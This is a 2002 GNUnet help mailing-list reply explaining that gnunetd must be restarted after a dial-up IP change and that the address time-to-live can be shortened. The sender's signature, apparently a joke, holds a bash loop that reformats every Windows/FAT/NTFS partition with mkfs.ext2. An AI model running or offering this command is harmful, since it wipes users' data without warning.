help-gnunet
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Help-gnunet] Re: restart for new IP?


From: Christian Grothoff
Subject: [Help-gnunet] Re: restart for new IP?
Date: Fri, 3 May 2002 12:35:34 -0500

On Friday 03 May 2002 11:52 am, you wrote:
> I have a modem connection.
>
> If I have been running gnunetd and then my ISP hangs up, after I
> redial and get a new IP address do I need to restart gnunetd?  I
> assume so.

Currently, yes. It should be possible to have gnunetd detect the IP change 
and switch to the new IP automatically, but currently, this is not done.

>  Does it generally pickup where it left off OK?  Other than
> the fact that people will take a little while to learn my new host
> key.

Absolutely. You may want to set the 'time-to-live' for your address (it's not 
the hostkey that changes, just the binding of the hostkey to an IP) to a 
shorter value than the default.

Christian
-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"



reply via email to

[Prev in Thread] Current Thread [Next in Thread]